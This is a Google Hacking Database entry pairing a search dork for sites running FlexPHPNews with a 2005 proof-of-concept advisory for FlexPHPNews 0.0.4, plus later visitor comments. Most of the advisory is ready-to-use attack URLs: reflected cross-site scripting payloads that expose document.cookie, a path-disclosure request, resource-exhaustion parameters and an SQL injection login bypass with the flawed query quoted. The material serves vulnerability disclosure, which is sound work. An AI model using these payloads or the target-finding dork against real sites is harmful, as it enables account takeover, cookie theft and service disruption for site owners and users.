GHDB
GHDB
|
Google Search: “Powered by FlexPHPNews” inurl:news | inurl:press
rgod rates this entry 8 out of 10. Submitted: 2005-08-07 00:00:00 Added by: rgod Hits: 8454 Score: 8 24/07/2005 2.38.13Flex PHPNews 0.0.4 login bypass/ sql injection, cross site scripting & resource consumption poc exploitsoftware:author site:http://www.china-on-site.com/flexphpnews/downloads.phpxss / cookie disclosure:http://[target]/[path]/index.php?front_indextitle=alert(document.cookie)http://[target]/[path]/index.php?front_searchsubmit=”>alert(document.cookie)http://[target]/[path]/index.php?front_latestnews=”>alert(document.cookie)http://[target]/[path]/news.php?newsid=”>alert(document.cookie)http://[target]/[path]/news.php?front_rating=”>alert(document.cookie)http://[target]/[path]/news.php?salt=”>alert(document.cookie)http://[target]/[path]/news.php?front_letmerateit=”>alert(document.cookie)http://[target]/[path]/news.php?front_ratebest=”>alert(document.cookie)http://[target]/[path]/news.php?front_ratesubmit=”>alert(document.cookie)http://[target]/[path]/news.php?front_searchsubmit=”>alert(document.cookie)http://[target]/[path]/search.php?front_searchresult=alert(document.cookie)http://[target]/[path]/search.php?front_searchsubmit=”>alert(document.cookie)http://[target]/[path]/catalog.php?front_searchsubmit=”>alert(document.cookie)http://[target]/[path]/catalog.php?front_latestnews=”>alert(document.cookie)http://[target]/[path]/catalog.php?catalogid=”>alert(document.cookie)path disclosure:http://[target]/[path]/admin/usercheck.php?logincheck=%00denial of service / resources consumption:http://[target]/[path]/news.php?prenumber=99999999999999999999999999999999http://[target]/[path]/news.php?nextnumber=99999999999999999999999999999999($prenumber and $nextnumber are uninitialized final values of a loop…) sql injection / bypass authentication:go to login page:http://[target]/[path]/admin/(usually admin if not changed)login as user: ‘ OR ‘a’='aand pass : ‘ OR ‘a’='a boom! you’re admin …the problem is in usercheck.php at line 5:$sql = “select username from newsadmin where username=’$checkuser’ and password=’$checkpass’”;you can post always true statements, like ‘a’='a’solution: replace $checkuser and $checkpass vars with your username and pass, by the moment Comments: 2005-08-23 10:19:52 (userdan): The SQL injection doesn’t work…Either that, or i’m doing something wrong. |
Does GHDB still updates for now?
The GHDB is alive and well, updated through the ExploitDB: http://www.exploit-db.com/google-dorks.
Hi Johnny,been a while since I’ve came last. Aren’t you gonna update this website anymore???
The GHDB is not updated and lives with the exploitdb: http://http://www.exploit-db.com. Please check out the awesome folks at Offensive Security as well: http://www.offensive-security.com!
Is any offline view-able resources is available of this product ?